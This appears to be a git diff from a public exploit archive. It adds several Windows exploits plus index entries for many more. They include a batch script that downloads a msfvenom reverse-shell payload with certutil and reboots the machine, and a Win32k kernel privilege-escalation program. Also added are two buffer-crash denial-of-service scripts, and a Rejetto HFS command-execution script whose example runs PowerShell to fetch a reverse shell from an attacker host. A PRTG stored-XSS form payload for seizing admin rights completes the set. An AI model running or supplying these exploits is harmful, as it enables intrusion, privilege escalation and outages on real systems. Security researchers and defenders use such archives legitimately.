+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.intel.com/
+# Version: v5.2
+# Tested on: Windows 7
+# Source: https://www.totalpentest.com/post/intel-r-user-notification-service-unquoted-service-path-privilege-escalation
+
+@ECHO OFF
+ECHO
+=======================================================================================================================
+ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation
+ECHO
+=======================================================================================================================
+ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
+wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+sc qc UNS
+ECHO [+] Your mandoroty level is:
+whoami /groups | findstr /B /C:"Mandatory Label"
+::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
+::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe
+ECHO [?]
+ECHO [+] Enumeration was completed successfully.
+ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted.
+PAUSE
+certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe"
+IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" (
+  ECHO [+] The download was successful.
+) ELSE (
+  ECHO [-] The download was unsuccessful.
+  PAUSE
+)
+ECHO [!] If you continue, system will reboot.
+PAUSE
+shutdown /r /t 0
+::code end
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49147.txt b/exploits/windows/local/49147.txt
new file mode 100644
index 000000000..c04c69d35
--- /dev/null
+++ b/exploits/windows/local/49147.txt
@@ -0,0 +1,30 @@
+# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC)
+# Date: 2020-01-12
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.asctimetables.com/#!/home
+# Software Link: https://www.asctimetables.com/#!/home/download
+# Version:  2021.6.2
+# Tested on: Windows 10 Home x64
+
+# STEPS
+# Open the program aSc Timetables 2021
+# In File select the option New
+# Put any letter in the fiel Name of the Schooland click Next
+# In the next Windows click NEXT
+# In the Step 3, in Subject click in New 
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Metoo.txt"
+# Paste the content in the field Subject title
+# Click in OK
+# End :)
+
+buffer = 'Z' * 10000
+
+try: 
+    file = open("Metoo.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/local/49157.txt b/exploits/windows/local/49157.txt
new file mode 100644
index 000000000..abfeb5e1f
--- /dev/null
+++ b/exploits/windows/local/49157.txt
@@ -0,0 +1,38 @@
+# Exploit Title: IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path
+# Discovery by: Manuel Alvarez
+# Software link: https://www.pconlife.com/download/otherfile/20566/e82994866a370a480607637f28b82835/
+# Discovery Date: 2020-11-27
+# Tested Version: 1.0.6433.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i
+"Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Audio service     STacSV     c:\Program Files\IDT\WDM\STacSV64.exe    Auto
+
+# Service info:
+
+C:\>sc qc StacSV
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: StacSV
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe
+        GRUPO_ORDEN_CARGA  : AudioGroup
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Audio Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49179.cpp b/exploits/windows/local/49179.cpp
new file mode 100644
index 000000000..c26e368ad
--- /dev/null
+++ b/exploits/windows/local/49179.cpp
@@ -0,0 +1,113 @@
+# Exploit Title: Microsoft Windows - Win32k Elevation of Privilege
+# Author: nu11secur1ty
+# Date: 08.03.2020
+# Exploit Date: 01/14/2020
+# Vendor: Microsoft
+# Software Link: https://support.microsoft.com/en-us/help/3095649/win32k-sys-update-in-windows-october-2015
+# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/raw/master/Undefined/CVE-2020-0624/win32k/__32-win32k.sys5.1.2600.1330.zip
+# CVE: CVE-2020-0642
+
+[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
+[+] Source:  readme from GitHUB
+
+[Exploit Program Code]
+
+// cve-2020-0624.cpp
+
+#pragma warning(disable: 4005)
+#pragma warning(disable: 4054)
+#pragma warning(disable: 4152)
+#pragma warning(disable: 4201)
+
+#include <Windows.h>
+#include "ntos.h"
+
+typedef NTSTATUS(NTAPI* PFNUSER32CALLBACK)(PVOID);
+
+HWND hParent{}, hChild{};
+BOOL Flag1{}, Flag2{};
+
+PFNUSER32CALLBACK OrgCCI2{}, OrgCCI3{};
+
+NTSTATUS NTAPI NewCCI2(PVOID Param)
+{
+	if (Flag1)
+	{
+		Flag1 = FALSE;
+		Flag2 = TRUE;
+		DestroyWindow(hParent);
+	}
+	return OrgCCI2(Param);
+}
+NTSTATUS NTAPI NewCCI3(PVOID Param)
+{
+	if (Flag2)
+	{
+		ExitThread(0);
+	}
+	return OrgCCI3(Param);
+}
+int main()
+{
+	DWORD OldProtect{};
+
+	PTEB teb = NtCurrentTeb();
+	PPEB peb = teb->ProcessEnvironmentBlock;
+	PVOID pCCI2 = &((PVOID*)peb->KernelCallbackTable)[2];
+	if (!VirtualProtect(pCCI2, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
+		return 0;
+	OrgCCI2 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI2,
+&NewCCI2);
+
+	PVOID pCCI3 = &((PVOID*)peb->KernelCallbackTable)[3];
+	if (!VirtualProtect(pCCI3, sizeof(PVOID), PAGE_EXECUTE_READWRITE, &OldProtect))
+		return 0;
+	OrgCCI3 = (PFNUSER32CALLBACK)InterlockedExchangePointer((PVOID*)pCCI3,
+&NewCCI3);
+
+	hParent = CreateWindow(L"ScrollBar", L"Parent", WS_OVERLAPPEDWINDOW,
+CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, NULL, NULL, NULL);
+	hChild = CreateWindow(L"ScrollBar", L"Child", WS_OVERLAPPEDWINDOW |
+WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, 10, 10, NULL, 0, NULL,
+NULL);
+	Flag1 = TRUE;
+	SendMessage(hChild, WM_LBUTTONDOWN, 0, 0);
+	return 0;
+}
+
+
+[Vendor]
+Microsoft
+
+
+[Vulnerability Type]
+Privilege Escalation
+
+
+[Description]
+The entry creation date may reflect when the CVE ID was allocated or
+reserved, and does not necessarily indicate when this vulnerability
+was discovered, shared with the affected vendor, publicly disclosed,
+or updated in CVE.
+- - - more: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0642
+
+[Disclosure Timeline]
+An elevation of privilege vulnerability exists in Windows when the
+Win32k component fails to properly handle objects in memory. An
+attacker who successfully exploited this vulnerability could run
+arbitrary code in kernel mode. An attacker could then install
+programs; view, change, or delete data; or create new accounts with
+full user rights.
+To exploit this vulnerability, an attacker would first have to log on
+to the system. An attacker could then run a specially crafted
+application that could exploit the vulnerability and take control of
+an affected system.
+The update addresses this vulnerability by correcting how Win32k
+handles objects in memory.
+
+
+[+] Disclaimer
+The entry creation date may reflect when the CVE ID was allocated or
+reserved, and does not necessarily indicate when this vulnerability
+was discovered, shared with the affected vendor, publicly disclosed,
+or updated in CVE.
\ No newline at end of file
diff --git a/exploits/windows/remote/43936.py b/exploits/windows/remote/43936.py
index 0c9757302..972cee8c0 100755
--- a/exploits/windows/remote/43936.py
+++ b/exploits/windows/remote/43936.py
@@ -72,7 +72,7 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
 
-    print "[*] Testing connection to tatget %s:%s" %(host,port)
+    print "[*] Testing connection to target %s:%s" %(host,port)
     s.connect((host, port))
 
 except:
diff --git a/exploits/windows/remote/49127.py b/exploits/windows/remote/49127.py
new file mode 100755
index 000000000..3e454c91b
--- /dev/null
+++ b/exploits/windows/remote/49127.py
@@ -0,0 +1,35 @@
+# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
+# Google Dork: None
+# Date: 20.08.2020
+# Exploit Author: strider
+# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
+# Software Link: https://github.com/ik80/YATinyWinFTP
+# Tested on: Windows 10
+
+------------------------------[Description]---------------------------------
+
+This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
+The result it crashes
+
+ -----------------------------[Exploit]---------------------------------------------
+
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+import socket, sys
+
+target = (sys.argv[1], int(sys.argv[2]))
+buffer = b'A' * 272 + b'\x20'
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(target)
+print(s.recv(1024))
+s.send(buffer)
+s.close()
+
+ -----------------------------[how to run]-----------------------------
+
+C:\> TinyWinFTP.exe servepath port
+
+~$ python3 exploit.py targetip port
+
+Boom!
\ No newline at end of file
diff --git a/exploits/windows/webapps/49125.py b/exploits/windows/webapps/49125.py
new file mode 100755
index 000000000..e8f8eed53
--- /dev/null
+++ b/exploits/windows/webapps/49125.py
@@ -0,0 +1,29 @@
+# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
+# Google Dork: intext:"httpfileserver 2.3"
+# Date: 28-11-2020
+# Remote: Yes
+# Exploit Author: Óscar Andreu
+# Vendor Homepage: http://rejetto.com/
+# Software Link: http://sourceforge.net/projects/hfs/
+# Version: 2.3.x
+# Tested on: Windows Server 2008 , Windows 8, Windows 7
+# CVE : CVE-2014-6287
+
+#!/usr/bin/python3
+
+# Usage :  python3 Exploit.py <RHOST> <Target RPORT> <Command>
+# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
+
+import urllib3
+import sys
+import urllib.parse
+
+try:
+	http = urllib3.PoolManager()	
+	url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
+	print(url)
+	response = http.request('GET', url)
+	
+except Exception as ex:
+	print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
+	print(ex)
\ No newline at end of file
diff --git a/exploits/windows/webapps/49156.txt b/exploits/windows/webapps/49156.txt
new file mode 100644
index 000000000..d73c51211
--- /dev/null
+++ b/exploits/windows/webapps/49156.txt
@@ -0,0 +1,33 @@
+# Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS
+# Date: 2/12/2020
+# Exploit Author: Amin Rawah
+# Vendor Homepage: https://www.paessler.com/prtg
+# Software Link: https://www.paessler.com/prtg
+# Version: 20.4.63.1412 x64
+# Tested on: Windows 
+# CVE : CVE-2020-14073
+
+Description:
+Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator.
+
+Steps:
+1- Login to PRTG system and view source code (currentUserId)
+2- Create a map, add an element, double click the element and modify the HTML section 'HTML After'
+3- In 'HTML After' add the following code:
+ <form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="name&#95;" value="PRTG&#32;Administrators" />
+      <input type="hidden" name="defaulthome&#95;" value="&#47;welcome&#46;htm" />
+      <input type="hidden" name="isadgroup" value="0" />
+      <input type="hidden" name="adusertype&#95;" value="0" />
+      <input type="hidden" name="aduserack&#95;" value="0" />
+      <input type="hidden" name="users&#95;" value="1" />
+      <input type="hidden" name="users&#95;" value="1" />
+      <input type="hidden" name="users&#95;&#95;check" value="<currentUserId>&#124;<YOUR_USERNAME>&#124;" />
+      <input type="hidden" name="users&#95;&#95;check" value="100&#124;PRTG&#32;System&#32;Administrator&#124;" />
+      <input type="hidden" name="id" value="200" />
+      <input type="hidden" name="targeturl" value="&#47;systemsetup&#46;htm&#63;tabid&#61;6" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <svg/onload='document.forms[0].submit()'/>  
+4- Save and share the link with PRTG Administrator.
+5- Login with the highest privilege.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0d8798fae..3e318052e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11211,6 +11211,14 @@ id,file,description,date,author,type,platform,port
 49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
 49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,
 49116,exploits/windows/local/49116.py,"Foxit Reader 9.0.1.1049 - Arbitrary Code Execution",2020-11-27,CrossWire,local,windows,
+49134,exploits/windows/local/49134.py,"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)",2020-12-01,Sectechs,local,windows,
+49141,exploits/windows/local/49141.txt,"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path",2020-12-01,SamAlucard,local,windows,
+49142,exploits/windows/local/49142.txt,"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path",2020-12-01,"Emmanuel Lujan",local,windows,
+49143,exploits/windows/local/49143.txt,"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path",2020-12-01,Jok3r,local,windows,
+49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
+49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,
+49157,exploits/windows/local/49157.txt,"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path",2020-12-02,"Manuel Alvarez",local,windows,
+49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18313,6 +18321,9 @@ id,file,description,date,author,type,platform,port
 49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
 49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
 49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
+49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
+49169,exploits/multiple/remote/49169.sh,"Ksix Zigbee Devices - Playback Protection Bypass (PoC)",2020-12-02,"Alejandro Vazquez Vazquez",remote,multiple,
+49176,exploits/linux/remote/49176.txt,"Mitel mitel-cs018 - Call Data Information Disclosure",2020-12-02,"Andrea Intilangelo",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43345,3 +43356,53 @@ id,file,description,date,author,type,platform,port
 49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
 49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
 49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,
+49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,
+49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,
+49126,exploits/hardware/webapps/49126.py,"Intelbras Router RF 301K 1.1.2 - Authentication Bypass",2020-11-30,"Kaio Amaral",webapps,hardware,
+49128,exploits/php/webapps/49128.txt,"TypeSetter 5.1 - CSRF (Change admin e-mail)",2020-12-01,"Alperen Ergel",webapps,php,
+49129,exploits/php/webapps/49129.txt,"Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload",2020-12-01,ThelastVvV,webapps,php,
+49130,exploits/php/webapps/49130.py,"Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting",2020-12-01,B3KC4T,webapps,php,
+49131,exploits/php/webapps/49131.txt,"Online Shopping Alphaware 1.0 - Error Based SQL injection",2020-12-01,"Moaaz Taha",webapps,php,
+49132,exploits/php/webapps/49132.py,"Pharmacy/Medical Store & Sale Point 1.0  - 'email' SQL Injection",2020-12-01,naivenom,webapps,php,
+49133,exploits/multiple/webapps/49133.py,"Setelsa Conacwin 3.7.1.2 - Local File Inclusion",2020-12-01,"Bryan Rodriguez Martin",webapps,multiple,
+49135,exploits/php/webapps/49135.txt,"Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS",2020-12-01,yunaranyancat,webapps,php,
+49136,exploits/php/webapps/49136.txt,"Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-01,"Saeed Bala Ahmed",webapps,php,
+49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,
+49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,
+49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2020-12-01,"Matthew Aberegg",webapps,php,
+49183,exploits/php/webapps/49183.py,"Online Matrimonial Project 1.0 - Authenticated Remote Code Execution",2020-12-03,"Valerio Alessandroni",webapps,php,
+49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
+49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
+49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,
+49148,exploits/multiple/webapps/49148.txt,"ILIAS Learning Management System 4.3 - SSRF",2020-12-02,Dot,webapps,multiple,
+49149,exploits/php/webapps/49149.txt,"Pharmacy Store Management System 1.0 - 'id' SQL Injection",2020-12-02,"Aydın Baran Ertemir",webapps,php,
+49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,
+49151,exploits/multiple/webapps/49151.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF",2020-12-02,"Hardik Solanki",webapps,multiple,
+49152,exploits/multiple/webapps/49152.txt,"Student Result Management System 1.0 - Authentication Bypass SQL Injection",2020-12-02,"Ritesh Gohil",webapps,multiple,
+49153,exploits/multiple/webapps/49153.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting",2020-12-02,"Soushikta Chowdhury",webapps,multiple,
+49154,exploits/php/webapps/49154.py,"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution",2020-12-02,zetc0de,webapps,php,
+49155,exploits/php/webapps/49155.py,"WonderCMS 3.1.3 - Authenticated Remote Code Execution",2020-12-02,zetc0de,webapps,php,
+49156,exploits/windows/webapps/49156.txt,"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS",2020-12-02,"Amin Rawah",webapps,windows,
+49159,exploits/multiple/webapps/49159.txt,"Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting",2020-12-02,"Sagar Banwa",webapps,multiple,
+49160,exploits/multiple/webapps/49160.txt,"NewsLister - Authenticated Persistent Cross-Site Scripting",2020-12-02,"Emre Aslan",webapps,multiple,
+49161,exploits/multiple/webapps/49161.txt,"Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
+49162,exploits/multiple/webapps/49162.txt,"Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting",2020-12-02,"Parshwa Bhavsar",webapps,multiple,
+49163,exploits/multiple/webapps/49163.txt,"Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass",2020-12-02,"Aditya Wakhlu",webapps,multiple,
+49164,exploits/php/webapps/49164.txt,"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting",2020-12-02,"Hemant Patidar",webapps,php,
+49166,exploits/multiple/webapps/49166.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
+49167,exploits/multiple/webapps/49167.txt,"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile",2020-12-02,"Shahrukh Iqbal Mirza",webapps,multiple,
+49168,exploits/multiple/webapps/49168.txt,"DotCMS 20.11 - Stored Cross-Site Scripting",2020-12-02,"Hardik Solanki",webapps,multiple,
+49170,exploits/multiple/webapps/49170.txt,"WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass",2020-12-02,"Aakash Madaan",webapps,multiple,
+49171,exploits/multiple/webapps/49171.txt,"ChurchCRM 4.2.0 - CSV/Formula Injection",2020-12-02,"Mufaddal Masalawala",webapps,multiple,
+49172,exploits/multiple/webapps/49172.txt,"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)",2020-12-02,"Mufaddal Masalawala",webapps,multiple,
+49173,exploits/php/webapps/49173.txt,"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality",2020-12-02,"Mufaddal Masalawala",webapps,php,
+49174,exploits/php/webapps/49174.txt,"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover",2020-12-02,"Mufaddal Masalawala",webapps,php,
+49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
+49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
+49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
+49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
+49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
+49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
+49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
+49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,